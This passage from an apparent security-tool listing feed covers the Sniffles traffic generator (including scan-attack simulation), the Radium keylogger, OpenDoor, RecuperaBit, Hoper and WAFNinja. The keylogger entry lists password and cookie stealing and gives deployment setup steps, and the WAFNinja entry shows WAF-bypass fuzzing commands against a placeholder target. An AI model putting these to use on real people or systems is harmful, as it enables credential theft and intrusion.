                      • -C Concurrent Flows: Number of flows that will be open at one time. Best effort in that if there are fewer flows than the number of concurrent flows designated then all of the current flows will be used. For example, if there are only 1000 flows remaining, but the number of concurrent flows was set to 10000, still only 1000 flows will be written out at that time. The default value is 1000. If used with duration the -C flows will be maintained throughout the duration which will ultimately disregard any input from -c. Note, the purpose of this is to create a diverse pcap where packets from the same flows are spread out rather than right next to each other and to create the illusion of many concurrent flows. In our tests, we have managed up to 2-3 million concurrent flows before memory becomes an issue. Also, we should mention that different latencies among streams can cause some flows to terminate ealier than others.
                      • -d Rules Directory: path to directory containing rule files. Will read every enabled rule in all rules file in the directory. Assumes all rules end with extension .rules. Use this option or -f, but not both. The # symbol is used to deactivate (i.e. comment out) a rule.
                      • -D Duration: Generate based on duration rather than on count. The duration is in seconds. Keep in mind that the default latency between packets is an average of 1-200 microseconds. For low latencies, a large duration could result in millions of packets which could take a long time to build. Also, duration is best effort. Essentially, new streams are not created after the duration is met, but there may be streams that have not completed. These are still written out so the actual duration may well be longer than that designated, but should not be less. Finally, set a larger latency if you wish to have fewer streams created during generation.
                      • -e eval: Create just one packet for each rule in the rule-set. Ignores all other input except -f. Each packet will have content matching the selected rule.
                      • -E Full Eval: Create one packet for each viable path in a pcre rule in the rule set. In other words ab(c|d)e would create two packets: abce and abde. Ignores all other input except -f.
                      • -f Rule File: read a single rule file as per the provided path and file name.
                      • -F Config: Designate a config file for Sniffles options. The config file is a way of fixing the parameters used for a run of Sniffles.
                      • -g Timestamp: set the starting time for the pcap timestamp. This will be the number of seconds since 12/31/1969. Default is current time.
                      • -h IP Home Prefixes: A list of IP Home Network Prefixes. IP addresses meant to come from an internal address will use these prefixes. Prefixes may designate an entire 4 byte IPv4 address in xxx.xxx format. For example: "10.192.168,172.16".
                      • -H IP v6 Home Prefixes: Same as IPv4 Home Prefixes just for IPv6. Notable exceptions, the separator is a colon with two bytes represented between colons.
                      • -i IPv6 percentage: Set this value between 1 and 100 to generate packets with IPv6. This will determine the percentage of streams that will be IPv6.
                      • -I Intensity of scan attack (i.e. packets per second.)
                      • -l Content Length: Fix the Content length to the number of bytes designated. Less than one will set the length equal to the content generated by nfa, or a random number between 10 and 1410 if headers are random too. Will truncate or pad the packet as necessary.
                      • -L Latency: Average latency in microsecond. If not set a random average latency between 1 and 200 usecs is determined for each stream. Thus, the packets for a given stream will have an average latency amount of time between each packet in the flow.
                      • -m Full match: Fully match rules. By default, generated content will only partially match rules, thus alerts should not be generated (not guaranteed though).
                      • -M Allows the use of a MAC distribution to have a custom MAC addresses in the traffic. By default, MAC addresses are randomly generated. More information about the MAC definition file can be found in the examples/mac_definition_file.txt. Note: You can specify up to two MAC definition files in order to set different values dependent on source or destination MACs. If you specify only one file, it will be used for either direction. If you use the following notation you can specify for specific directions. For example: 'path1:path2'. Path1 will be MAC definition file for source MACs and path2 will be the MAC definition file for destination MACs. You may also use a question mark (?) to designate one or the other as random as in: '?:path2' to have random source MACs but use the file for.
                      • -o output file: designate the name of the output file. By default, the file is named: sniffles.pcap.
                      • -O Offset: Offset before starting a scan attack. Also used when inserting multiple scans into the traffic. This is the number of seconds before the scan will start. If used with -R, this becomes the average number of seconds prior to start.
                      • -p Packets-per-stream: Designate the number of content-bearing packets for a single stream. If a positive value is provided as an argument then exactly x (if x is the provided integer) content-bearing packets will appear for each stream. If x is negative, then a random number of packets will appear for each stream (from 1 to abs(x)) By default, this value is 1.
                      • -P Target Port list: For a scan attack. Provide a comma-sep list of possible ports, or a single starting port. Otherwise ports will be scanned at random. If a single starting port is provided, then ports will be scanned in order from that point to 65535, after which it will roll back to the starting point. If a list is provided, the ports in the list will be scanned round-robin.
                      • -r Random: Generate random content rather than from the rules. If rules are still provided, the rules are used in the generation of the headers. Note: many features in the rules may overide certain aspects of the random generation.
                      • -R Random scan Attacks: Will use the Offset to create scan attacks in the traffic, but will use the offset only as a median. The offset is used to determine the amount of time between when a scan finishes and a new scan starts.
                      • -s Scan Attack: followed by a comma-sep list of ipv4 addr indicating what ip address to target. Each IP range will create one scan attack. The ranges should be like: 192.168.1.1 which would target exactly that one ip address while 192.168.1 would target a random ip addresses between 192.168.1.0 and 192.168.1.255.
                      • -S Scan type: 1==Syn scan (default) 2 == Connection scan.
                      • -t TCP Handshake: Include a TCP handshake in all TCPstreams. Off by default.
                      • -T TCP Teardown: Include a TCP teardown in all TCPstreams. Off by default.
                      • -v Verbosity: Increase the level of output messages.
                      • -w write content: Write the content strings to a file called 'all.re'
                      • -W Window: The window, or duration, in seconds of a scan attack.
                      • -Z Reply Chance: chance that a scan will have a reply. In other words, chance the target port is open (default 20%).

                      Examples:
                      NOTE: all examples assume you have installed the sniffles package.
                      To generate a pcap from a single file of regular expressions with 10 streams where every packet matches a rule
                      sniffles -c 10 -f myre.re -m
                      To generate a pcap from a single snort rule file where every packet almost matches a rule
                      sniffles -c 10 -f myrules.rules
                      To generate a pcap from multiple snort rule files in a single directory where every packet matches a rule.
                      sniffles -c 10 -d myrulesdir -m
                      To generate the same pcap as above, using the same rules, but with random content (Content is random, headers will still follow the rules--does not work with regex or Sniffles rules):
                      sniffles -c 10 -d myrulesdir -r
                      To generate a pcap with 10 streams (1 packet each) and with random data:
                      sniffles -c 10
                      To generate a pcap with 10 streams, each stream with 5 packets, with ACKs and handshake and teardown as well as a fixed length of 50 for the data in each data-bearing packet:
                      sniffles -c 10 -p 5 -l 50 -t -T -a
                      To generate a pcap with 20 random streams with a home network of 192.168.1-2.x:
                      sniffles -c 20 -h 192.168.1,192.168.2
                      To generate a pcap with 20 random streams with a home network of 192.168.x.x for IPv4 and 2001:8888:8888 for IPv6 with 50% of traffic IPv6:
                      sniffles -c 20 -h 192.168.1 -H 2001:8888:8888 -i 50
                      To generate a 5 second packet capture of random packets with an average lapse between packets of 100 microseconds:
                      sniffles -D 5 -L 100
                      To generate a pcap that will create one packet matching each rule in a rule file (or regex file) in sequence:
                      sniffles -f myrules.rules -e
                      To generate a pcap that will create a packet for every possible branch of a regex for each regex in a set of regex and then save that file to a pcap named everything.pcap is as below. However, this function can run in exponential time if the regex has a large amount of min-max couning so it may take a long time to run. Further, all other options except the two illustrated below are ignored.
                      sniffles -f myrules.rules -o everything.pcap -E
                      To generate random traffic with a scan attack occuring 2 seconds in and lasting for 2 seconds with 1000 scan packets per second and with the entire capture a duration of 5 seconds and lapse time of 50us and with starting port 80 (sequentially searching ports from 80):
                      sniffles -D 5 -O 2 -W 2 -I 1000 -L 50 -s 192.168.1.2 -P 80
                      Similar to above, but will create multiple scan attacks, each with duration of 1 second, and an average offset between attacks of 2 seconds. Further, only scans the designate ports. Also targets IP address in range 192.168.1.0-255 randomly.
                      sniffles -D 8 -O 2 -W 1 -I 10 -L 50 -s 192.168.1 -P 80,8080,8000,8001

                      Sniffles Rule Format:
                      Sniffles supports several rule formats. First, Sniffles can parse Snort rules, and regular expressions (at one per line). In addition to this, Sniffles also has its own rule format that can be used to explicitly control traffic. This is done through the use of xml files that will describe the traffic. When this format is used the other options for Sniffles may be irrelevant. Example rule files can be found in the examples directory. These rule files are used simply by designating the rule file with the -f option (i.e. sniffles -f rules.xml)
                      The Sniffles rule format is as follows:
                      <?xml version="1.0" encoding="utf-8"?>
                      <petabi_rules>
                      <rule name="test" >
                      <traffic_stream proto="tcp" src="any" dst="any" sport="any"
                      dport="any" handshake="True" teardown="True" synch="True" ip="4">
                      <pkt dir="to server" content="/abc/i" fragment="0" times="1" />
                      <pkt dir="to client" content="/def/i" fragment="0" times="1" />
                      </traffic_stream>
                      <traffic_stream proto="tcp" src="any" dst="any" sport="any"
                      dport="any" handshake="True" teardown="True" synch="True">
                      <pkt dir="to server" content="/abc/i" fragment="0" times="1" />
                      <pkt dir="to client" content="/def/i" fragment="0" times="1" />
                      </traffic_stream>
                      </rule>
                      </petabi_rules>
                      In detail, the tags work as follows:
                      • <petabi_rules> </petabi_rules> : This defines all of the rules for this rules file. There should only be one set of these tags opening and closing all of the designated traffic streams.
                        • <rule > </rule> : Designates a single rule. A single rule can generate an arbitrary number of traffic streams or packets. May have any number of rules in a single file.
                          • Options:
                            • name: The name for this rule. Mostly for documentation, no real function.
                          • <traffic_stream> </traffic_stream> : A traffic stream defines traffic between two endpoints. All pkts designated within a single traffic stream will share the same endpoints. Any number of traffic streams can be designatted for a given rule. Different traffic streams within the same rule may have different end-points or not depending on the settings below.
                            • Options:
                              • typets: Specify which type of traffic stream we will use to generate packet. Currently, we have Standard and ScanAttack.
                              • scantype: 1==Syn scan (default) 2 == Connection scan. It is used with ScanAttack.
                              • target: Specify the target ip address for Scan Attack.
                              • targetports: For a scan attack. Provide a comma-sep list of possible ports, or a single starting port. Otherwise ports will be scanned at random. If a single starting port is provided, then ports will be scanned in order from that point to 65535, after which it will roll back to the starting point. This option is used together with typets being 'ScanAttack'
                              • srcport: Specify the source port for Scan Attack. Random by default
                              • duration: The window, or duration, in seconds of a scan attack if typets is 'ScanAttack'
                              • intensity: Intensity of scan attack if typets is 'ScanAttack'.
                              • offset: Offset before starting a scan attack. Also used when inserting multiple scans into the traffic.
                              • replychance: Chance that a scan will have a reply. In other words, chance the target port is open (default 20%). It is used with ScanAttack.
                              • proto: Designates the protocol of this traffic stream. Should be TCP or or UDP or ICMP (not tested).
                              • src: Source IP address. May be an address in xxx.xxx.xxx.xxx format, $EXTERNAL_NET (for an external address--assumes a home network has been designated), $HOME_NET, or any (randomly selects IP address).
                              • dst: Destination IP Address. Same as Source IP Address.
                              • sport: Source port (assumes TCP or UDP). Can use snort port formatting which can be a comma separated list in brackets (i.e. [80,88,89]), a range (i.e. [10:1000]), or any (i.e. random pick from 0-65535).
                              • dport: Destination Port as per sport.
                              • handshake: Will generate a TCP Handshake at the start of the stream. If excluded, there will be no handshake. Valid values are true or false. Default is false.
                              • latency: set the average latency between packets (in microseconds).
                              • teardown: Will close the stream when all traffic has been sent by appending the TCP teardown at the end of the traffic stream. Valid values are true or false. Default is false.
                              • synch: Traffic streams are synchronous or not. When true, one traffic stream must finish prior to the next traffic stream starting. When false, all contiguous streams that are false (i.e. asynchronous) will execute at the same time.
                              • tcp_overlap: The default value is false. When true, from the second packet will be appended one extra content and the tcp sequence number will be reduced by one to simulate the tcp overlapping sequence number.
                              • ipv: Designate IPv4 or IPv6. Valid options are 4, or 6. Default is 4.
                              • out_of_order: Randomly have packets arrive out-of-order. Note, this only works with packets that use the 'times' option. Further, this option should also be used with ack so that the proper duplicate acks will appear in the traffic trace. Valid values are true or false. Default is false.
                              • out_of_order_prob: Set the probability that packets will arrive out-of-order. For example, 10 would mean that there is a 10% chance for each packet to arrive out of order. Out-of-order packets arrive after all of the in-order packets. Further, they are randomly mixed as well. Thus, if the first packets 2 and 5 of 10 packets are determined to be out of order, they will arrive last of the 10 packets (slots 9 and 10) and will be in an arbitrary order (i.e. 5 may come before 2 or vice versa). The value for this must be between 1 and 99. Default is 50.
                              • packet_loss: Randomly have packets be dropped (i.e. not arrive). This only works with the 'times' option. Further, this option should also be used with the ack option set to true so that duplicate acks will appear in the traffic trace. Valid values are 1 to 99 representing the chance that a packet will be dropped. Note, the packet drop only happens on data-bearing packets, not on the acks.
                              • ack: Have every data packet in this flow be followed by an ACK from the server. Valid values are true or false. Default is false.
                            • <pkt > </pkt> : This directive designates either an individual packet or a series of packets. The times feature can be used to have one directive generate several packets. Otherwise, it is necessary to explicitly designate each packet in each direction.
                              • Options:
                                • dir: The direction of the packet. Valid values are to server or to client. The inititial src IP is considered the client, and the intitial dst IP the server. Thus 'to server' sends a packet from client to server and 'to client' send a packet from server to client. Default is to server.
                                • content: Regular expression designating the content for this packet. Size of the packet will depend on the regular expression.
                                • fragment: Whether or not to fragment this packet. Only works with ipv4. Should have a value larger than 2. Will create as many fragments as are valid or as designated (whichever is smaller). Default value is 0 meaning no fragments.
                                • ack: Send an ack to this packet or not. Valid values are true or false. Default is false.
                                • split: Split the content among the designated number of packets. By default all content is sent in a single packet (fragments are small exception to this rule).
                                • times: Send this packet x times. Default value is 1, a positive value will send exactly x packets (possibly with acks if ack is true), while a negative number will send a random number of packets between 1 and abs(-x).
                                • ttl: set time to live value for packet. By default, sniffles will generate random TTL value.
                                • ttl_expiry: simulate the ttl expiry attack by breaking packets into multiple packet with one malicious packet between two good packet. By default, the value is 0 (No malicious packet). If the value is nonzero, it will insert malicious packet with this ttl equals ttl_expiry value. If the ttl value is set, good packet will be set with new ttl value
                      Final Notes: The new rule format is just a beginning and may contain problems. Please alert me of any inconsitencies or errors. Further, the intent is to exapand the options to provide more and more functionality as needed. Please contact me with desired features. Finally, this product is provided as is. There is no guaranttee of functionality or accuracy. Feel free to branch this project to meet your own needs.

                      Credits:
                      This application has been brought to you by Petabi, Inc. where we make Reliable, Realistic, and Real-fast security solutions.
                      Authors:
                      • Victor C. Valgenti
                      • Min Sik Kim
                      • Tu Le

                      New Features:
                      • 11/21/2014: Version 1.4.0 Added traffic splitting and traffobot for bi-directional traffic generation. Fixed bug where an exception was thrown when the amount of traffic generated could fit in a single traffic write call. Reformatted and enabled usage. Finally, added unit tests for traffobot and XML parsing.
                      • 02/03/2015: Version 2.0. Completely rewrote how streams work in order to reduce memory requirments when generating large streams using special rules. Currently, can handle around 2-3 million concurrent flows before things bog down. I have added some features to try and help for when creating large flows. First, generate with somthing like a concurrency of 2-3 million flows. Also, do not use teardown for these flows. A fraction of the flows will last from the beginning through to the end of the capture while the remainder will be closed out every batch period. I will work on making this more efficient, but managing all of the complex options in Sniffles now cannot really be done cheaply in memory. The only other solution is to get a beefier machine with more RAM. This version also contains a variety of fixes.
                      • 02/11/2015: Added probability to out-of-order packets to allow the frequency of out of order packets to be tuned.
                      • 03/05/2015: Changed TCP teardown to standard teardown sequence. Now allow content to be spread across multiple packets without using fragments.
                      • 04/09/2015: Fixed scan traffic, it was partially broken during one of the previous changes. The pcap starting timestamp now defaults to the current time and can be set with the -g option. Finally, the 3rd packet in the 3-way tcp handshake will now be data-bearing if the client is to send data first.
                      • 05/22/2015: Rewrote rule-parsing to simplify the ability to extend rule the rule parser to accomodate more formats. Embedded nfa traversal and pcre directly into sniffles. Cleaned up code and prepared it for the public.
                      • 05/27/2015: Updated documentation, merged in pcre libraries and nfa construction to make sniffles a self-contained package. Added the Regex Generator and the Random Rule Generator as a part of the Sniffles package. Updated version to 3.0.0 and published to github.
                      • 08/12/2015: Implemented a large number of bug fixes and new features. Fundamentally changed how streams and flows are handled to allow for improved extensibility. Added per flow latency. Updated documentation.

                      Regular Expression Generator
                      This is a simple regular expression generator. It creates regular expressions either completely randomly, or based on a serires of distributions. The controls that can be placed on how the regular expressions are generated are structural rather than contextual. In other words, there is no effort to make certain string tokens appear in the generated regular expressions. However, the probability distributions can be tweeked to affect the types of features found in the rules like character classes, alternation, repetition, etc.

                      Install
                      Will be automatically installed with the rest of Sniffles.

                      Options
                      regexgen--Random Regular Expression Generator.
                      usage: regexgen [-C char distribution] [-c number regex]
                      [-D class distribution] [-f output re file]
                      [-l lambda for length generation] [-n negation probability]
                      [-o options chance] [-R repetition chance] [-r repetition distribution]
                      [-t re structural type distribution] [-?] [-g]
                      • -C Character Distribution: This sets the possibility of seeing particular characters or character types. See a brief explanation of distibutions below for examples on how to use this. By default this distribution is an equal distribution. This distribution has five slots: ASCII Characters, Binary characters in \x00 format, Alphabetical letters (upper or lower case), Digits, and substitution classes (like \w). An example input to this would be "10,20,10,40,20" which would mean 10% chance any generated char would come from 10% ASCII, 20% binary, 10% letters, etc. One Caveat is that ASCII chars that might cause problems with regular expression (like `[' or '{') are converted to hex representation (\x3b for example).
                      • -c Number of regular expressions to generate. Default is one.
                      • -D Class Distribution: There are only two slots in the class distribution. The first slot is the probability that the class is comprised of some number of randomly generated characters. The second slot is the probability that the class is comprised of ranges (like a-z).
                      • -f Output file name. This sets the name of the file where the regular expressions are stored. The default is a file named rand.re in the current working directory.
                      • -g Groups: All regular expressions will have a common prefix with at least one or more other regular expressions (as long as there are more than one regex.) A common prefix is just a regular expression that is the same for some set of regular expressions. The total number of possible common prefixes is from 1 to 1/2 the size of the total regular expressions to generate. The default value for this option is false. This option takes no parameters.
                      • -l Lambda for length: This is the mean length for an exponentional distribution of regular expression lengths. The default value is 10.
                      • -n Negation probability: The probability that a character class will be a negation class ([^xyz]) rather than a normal character class ([xyz]). Default probability is 50%.
                      • -o Option chance: This is the chance for an option to be appended to the regular expression. Current options are 'i', 'm', and 's'. A random number of options are added to the list with those options chose through a uniform distribution.
                      • -R Repetition chance: The chance of repetition occuring after any structural component has been added to the regular expression.
                      • -r Repetion distribution: The distribution of repetition structures. The slots are: Zero to one (?), Zero to many (*), one to many (+), and counting ({x,y}).
                      • -t Re structural type distribution: The distribution for the primary structural components of the regular expression. These are comprised of three slots, or categories: characters, classes, and alternation. Note, alternation will simply generate a smaller regular expression up to the size of the remaining length left to the re. In other words, alternation will result in several smaller regular expressions being joined into the overall regular expression. The alternation uses the exact same methodology in creating those smaller regular expressions.
                      • -? Print this help.
                        This generator will create random regular expressions. It is possible to tune the structures within the regular expressions to a probability distribution, but currently not the content. This is desirable in order to explore the maximum diversity in possible regular expressions (though not necessarily realistic regular expressions). The distributions are handled by creating a list of probabilities for the various possibilities, or slots, for a particular distribution. These are added as command line arguments using a simple string list like: "10,30,40,20". The list should have as many values as it has slots. The total of all values in the list should be 100 and there should not be any fractions. The value at each slot is the probability that that slot will be chosen. For example, the base RE structural type distribution has three slots. The first slot is the probability that the next structure type is a character (where a character can be a letter, digit, binary, ASCII, or substitution class (like \w)). The second slot is for character classes like [ab@%], [^123], or [a-z]. The final slot is the probability of alternation occuring like (ab|cd). With these three slots you can tune how often you would like the structures to appear in your regular expressions. For example, regexgen -c 10 -t "80,10,10" would create 10 regular expressions where 80% of the structures used would be characters, 10 percent would be character classes, and 10% alternation.

                      Random Rule Generator
                      The Random Rule Generator provides a mean for creating a number of randomly generated rules with which to test a particular platform. Currently, rules generated meet either the Snort rule format or are just lines of text. In order for the Random Rule Generator to work you must have a set of features defined. Example features can be found in the example_features folder and are further described below.

                      Install
                      Automatically installed with Sniffles
                      Note: The Random Rule Generator makes use of the Random Regex Generator for creating content of any kind.

                      Options
                      Random Rule Generator
                      usage: rulegen -c [number of rules] -f [feature set] -o [outfile] [-s]
                      • -c Number of rules: The number of rules to generate. Default is one.
                      • -f Feature set: The file containing the feature set description. Please see the documentation for further explanation of feature sets and how to describe them.
                      • -o Output file: output file to which rules are written. Default is rules.txt
                      • -s Snort rule format: write rules to a snort rule format. No parameters, defaults to off. When off, rules are just converted to a string format, whatever that may be based on the feature parser.

                      Feature Set
                      Features are used to describe potential aspects of rules used in IDS. For example, a packet filter might use rules that target IP source and destination address. In that case, it would be possible to create a feature set describing how those IP source and destination addresses should be generated. More specifically, we make the distinction between simple rules and complex rules. The difference between these two is the presence of ambiguous notations. For example, if we possessed an ambiguous notation of * to mean any IP address, then we could say that * represents an ambigous notation. Further, we know that a rule can also use a non-ambigous notation, like 192.168.1.1. That would represent a simple IP address as it is a single fixed IP address without any possible ambiguous notation. We then further define the range of the particular features (i.e. IP addresses across the entire 4 billion plus possible IPv4 addresses, or just some subset of that).
                      The features ultimately define all of the aspects of for an arbitrary rule. Given a feature set and a valid rule format, it becomes possible to randomly generate an arbitrary number of rules that use those features. In this manner, it is possible to generate test rule sets that will examine the IDS across a vector that is often missed.
                      Features are defined in a semi-colon separated list one feature per line type=feature; list of arguments in key=value pairs, lists using python formatting (i.e. [a, ..., z]). Feature define specific portions of a target rule format. Features may be extended to add more functionality. Optionally, one can extend the ability of the features by creating a new rule format.
                      Current Feature Types:
                      1. Feature -- generic feature
                      2. Content -- Content Feature
                      3. IP -- IP Feature
                      4. Protocol -- Protocol Feature
                      Ambiguous lists should be written as lists like [x:y] for a range, [x,y] for a list, {x1,x2,x3} for a set or just * for a wildcard or similar single option.
                      Example about ambiguous list:
                      ambiguity_list=[[2:9]]
                      it will generate [3:4], [5:6], etc (any [x:y] such that
                      x <= y and x >= 2 and y > x and y <= 9).

                      ambiguity_list=[[3,20]]
                      it will generate [3,9,10], [3,4,8,12], etc (any list [x1,x2,x3,..]
                      such that all values falling between 3 and 20.

                      ambiguity_list=[{5,6,10}]
                      it will generate a subset of {5,6,10} such as {5,10}, {5}.

                      ambiguity_list=[[2:9],[3,20],{5,6,11}]
                      it will pick one of [2:9], [3,20], and {5,6,11} and
                      generate a corresponding instance (see above)
                      Example for feature file:
                      type=protocol; name=proto; proto_list=[TCP,UDP,ICMP]; complexity_prob=0;ambiguity_list=None;
                      type=ip; name=sip; version=4; complexity_prob=100;
                      the above defines two features, a protocol features and a source IP feature. The protocol is named proto, which is important only for the rule formatter, and the valid protocols are: IP, TCP, UDP, and ICMP. The IP feature is defined as IPv4 and all rules will be complex. IP complexity is already part of the class and need not be added in the feature definition. This will create IP addresses using CIDR notation.
                      Generic Feature Attributes:
                      • Feature_name: Informational attribute, potentially valuable for the rule formatter.
                      • lower_bound: The lower boundary of possible values. Assumes the feature is a number.
                      • upper_bound: Opposite of lower_bound.
                      • complexity_prob: The probability of using complex features for a rule. From 0 to 100. Defaults to 0. When complex features are used, an ambigous notation is randomly selected from the ambiguity list, or if the feature defines a specific ambiguity (like IP addresses) then that is used. When complex features are not used, a value is generated using the boundaries, or, in the case of Content, using a set of distribution values that will restrict the generated string to a series of ASCII characters.
                      • ambiguity_list: A list of possible ambiguous notations. Comma-separated list using python formatting (i.e. [a, b, c]).
                      • toString(): Prints out an instance of a rule given this particular feature set.
                      Content Feature -- Inherits from Feature:
                      • regex: True or False. If True, will use pcre formatting for regex as well as possible add the options, i, s, or m to the regex.
                      • length: Defines the average length of the generated content.
                      • min_regex_length: Defines the minimum length of the regex.
                      Protocol Feature -- Inherits from Feature:
                      • proto_list: Defines the list of possible protocols, as a comma-separated list (i.e [TCP, UDP]).
                      IP Feature -- Inherits from Feature:
                      • version: 4 for IP version 4, 6 for IP version 6. Defaults to version 4.
                      Ambigous notation for ranges, lists, sets:
                      Range Notation: [x:y] means from x to y (inclusive).
                      List notation: [x,y] means list of some randomly determined number of values where each value is greater than or equal to x and smaller than or equal to y.
                      Set notation: {x1,x2,x3,x4} means a set of value x1, x2, x3, x4. It will generate a subset set of original set.
                      Please look at the example feature sets in the example_features folder for further examples. More details as well as the academic theory behind this are scheduled to be added later.


                      Radium-Keylogger - Python keylogger with multiple features

                      $
                      0
                      0

                      Python keylogger with multiple features.

                      Features
                      • Applications and keystrokes logging
                      • Screenshot logging
                      • Drive tree structure
                      • Logs sending by email
                      • Password Recovery for
                        • Chrome
                        • Mozilla
                        • Filezilla
                        • Core FTP
                        • CyberDuck
                        • FTPNavigator
                        • WinSCP
                        • Outlook
                        • Putty
                        • Skype
                        • Generic Network
                      • Cookie stealer
                      • Keylogger stub update mechanism
                      • Gather system information
                        • Internal and External IP
                        • Ipconfig /all output
                        • Platform

                      Usage
                      • Download the libraries if you are missing any.
                      • Set the Gmail username and password and remember to check allow connection from less secure apps in gmail settings.
                      • Set the FTP server. Make the folder Radium in which you'll store the new version of exe.
                      • Set the FTP ip, username, password.
                      • Remember to encode the password in base64.
                      • Set the originalfilename variable in copytostartup(). This should be equal to the name of the exe.
                      • Make the exe using Pyinstaller
                      • Keylogs will be mailed after every 300 key strokes. This can be changed.
                      • Screenshot is taken after every 500 key strokes. This can be changed.
                      • Remember: If you make this into exe, change the variable "originalfilename" and "coppiedfilename" in function copytostartup().
                      • Remember: whatever name you give to "coppiedfilename", should be given to checkfilename in deleteoldstub().

                      Things to work on
                      • Persistance
                      • Taking screenshots after a specific time. Making it keystrokes independent.
                      • Webcam logging
                      • Skype chat history stealer
                      • Steam credential harvestor


                      Requirements

                      Tutorial


                      OpenDoor - OWASP Directory Access Scanner

                      $
                      0
                      0

                      This application scans the site directories and find all possible ways to login, empty directories and entry points. Scans conducted in the dictionary that is included in this application. This software is written for informational purposes and is an open source product under the GPL license.
                      Testing of the software on the commercial systems and organizations is prohibited!

                      Requirements
                      • Python 2.7.x

                      Install Dependencies
                      sudo pip install -r requirements.txt  

                      Implements
                      • multithreading
                      • filesystem log
                      • detect redirects
                      • random user agent
                      • random proxy from proxy list
                      • verbose mode
                      • subdomains scanner

                      Changelog
                      • v1.0.0 - all the basic functionality is available
                      • v1.0.1 - added debug level as param --debug
                      • v1.2.1 - added filesystem logger (param --log)
                      • v1.2.2 - added example of usage (param --examples)
                      • v1.3.2 - added posibility to use random proxy from proxylist (param --proxy)
                      • v1.3.3 - simplify dependency installation
                      • v1.3.4 - added code quality watcher
                      • v1.3.5 - added ReadTimeoutError ProxyError handlers
                      • v1.3.51 - fixed code style, resolve file read errors
                      • v1.3.52 - code docstyle added
                      • v2.3.52 - subdomains scan available! (param --check subdomains). Added databases

                      Basic usage
                      python ./opendoor.py --url "http://joomla-ua.org"

                      Help
                      usage: opendoor.py [-h] [-u URL] [--update] [--examples] [-v] [-c CHECK]
                      [-t THREADS] [-d DELAY] [-r REST] [--debug DEBUG] [-p] [-l]
                      optional arguments:
                      -h, --help show this help message and exit
                      --update Update from version control
                      --examples Examples of usage
                      -v, --version Get current version
                      -c CHECK , --check CHECK
                      Directory scan eg --check=directories or subdomains
                      (directories by default)
                      -t THREADS , --threads THREADS
                      Allowed threads
                      -d DELAY , --delay DELAY
                      Delay between requests
                      -r REST , --rest REST
                      Request timeout
                      --debug DEBUG Debug level (0 by default)
                      -p, --proxy Use proxy list
                      -l, --log Use filesystem log
                      required named arguments:
                      -u URL , --url URL
                      URL or page to scan; -u http://example.com


                      RecuperaBit - A Tool For Forensic File System Reconstruction

                      $
                      0
                      0

                      A software which attempts to reconstruct file system structures and recover files. Currently it supports only NTFS.

                      RecuperaBit attempts reconstruction of the directory structure regardless of:
                      • missing partition table
                      • unknown partition boundaries
                      • partially-overwritten metadata
                      • quick format

                      You can get more information about the reconstruction algorithms and the architecture used in RecuperaBit by reading my MSc thesis or checking out the slides.

                      Usage
                      usage: main.py [-h] [-s SAVEFILE] [-w] [-o OUTPUTDIR] path

                      Reconstruct the directory structure of possibly damaged filesystems.

                      positional arguments:
                      path path to the disk image

                      optional arguments:
                      -h, --help show this help message and exit
                      -s SAVEFILE, --savefile SAVEFILE
                      path of the scan save file
                      -w, --overwrite force overwrite of the save file
                      -o OUTPUTDIR, --outputdir OUTPUTDIR
                      directory for restored contents and output files
                      The main argument is the path to a bitstream image of a disk or partition. RecuperaBit automatically determines the sectors from which partitions start.

                      RecuperaBit does not modify the disk image, however it does read some parts of it multiple times through the execution. It should also work on real devices, such as /dev/sda but this is not advised.
                      Optionally, a save file can be specified with -s . The first time, after the scanning process, results are saved in the file. After the first run, the file is read to only analyze interesting sectors and speed up the loading phase.

                      Overwriting the save file can be forced with -w .

                      RecuperaBit includes a small command line that allows the user to recover files and export the contents of a partition in CSV or body file format. These are exported in the directory specified by -o (or recuperabit_output ).

                      Pypy
                      RecuperaBit can be run with the standard cPython implementation, however speed can be increased by using it with the Pypy interpreter and JIT compiler:
                      pypy main.py /path/to/disk.img

                      Recovery of File Contents
                      Files can be restored one at a time or recursively, starting from a directory. After the scanning process has completed, you can check the list of partitions that can be recovered by issuing the following command at the prompt:
                      recoverable

                      Each line shows information about a partition. Let's consider the following output example:
                      Partition #0 -> Partition (NTFS, 15.00 MB, 11 files, Recoverable, Offset: 2048, Offset (b): 1048576, Sec/Clus: 8, MFT offset: 2080, MFT mirror offset: 17400)
                      If you want to recover files starting from a specific directory, you can either print the tree on screen with the tree command (very verbose for large drives) or you can export a CSV list of files (see help for details).

                      If you rather want to extract all files from the Root and the Lost Files nodes, you need to know the identifier for the root directory, depending on the file system type. The following are those of file systems supported by RecuperaBit:
                      File System Type Root Id
                      NTFS 5

                      The id for Lost Files is -1 for every file system.

                      Therefore, to restore Partition #0 in our example, you need to run:
                      restore 0 5
                      restore 0 -1
                      The files will be saved inside the output directory specified by -o .

                      Hoper - Trace URL's jumps across the rel links to obtain the last URL

                      $
                      0
                      0

                      It shows all the hops that makes a url you specify to reach its endpoint. For example if you want to see the entire trip by email URL or like a URL shorten. Hoper returns you all URLs redirections.

                      Installation
                      $ gem install hoper

                      Usage
                      Type in your command line:
                      $ hoper [url]

                      Development
                      After checking out the repo, run bin/setup to install dependencies. You can also run bin/console for an interactive prompt that will allow you to experiment.
                      To install this gem onto your local machine, run bundle exec rake install . To release a new version, update the version number in version.rb , and then run bundle exec rake release , which will create a git tag for the version, push git commits and tags, and push the .gem file to rubygems.org .


                      WAFNinja - Penetration testers favorite for WAF Bypassing

                      $
                      0
                      0

                      WAFNinja is a CLI tool written in Python. It shall help penetration testers to bypass a WAF by automating steps necessary for bypassing input validation. The tool was created with the objective to be easily extendible, simple to use and usable in a team environment. Many payloads and fuzzing strings, which are stored in a local database file come shipped with the tool. WAFNinja supports HTTP connections, GET and POST requests and the use of Cookies in order to access pages restricted to authenticated users. Also, an intercepting proxy can be set up.

                      Usage:
                      wafninja.py [-h] [-v] {fuzz, bypass, insert-fuzz, insert-bypass, set-db} ...
                      EXAMPLE:
                      fuzz:
                      python wafninja.py fuzz -u "http://www.target.com/index.php?id=FUZZ" 
                      -c "phpsessid=value" -t xss -o output.html
                      bypass:
                      python wafninja.py bypass -u "http://www.target.com/index.php"  -p "Name=PAYLOAD&Submit=Submit"         
                      -c "phpsessid=value" -t xss -o output.html
                      insert-fuzz:
                      python wafninja.py insert-fuzz -i select -e select -t sql
                      positional arguments: {fuzz, bypass, insert-fuzz, insert-bypass, set-db}
                      Which function do you want to use?

                      fuzz check which symbols and keywords are allowed by the WAF.
                      bypass sends payloads from the database to the target.
                      insert-fuzz add a fuzzing string
                      insert-bypass add a payload to the bypass list
                      set-db use another database file. Useful to share the same database with others.

                      optional arguments:
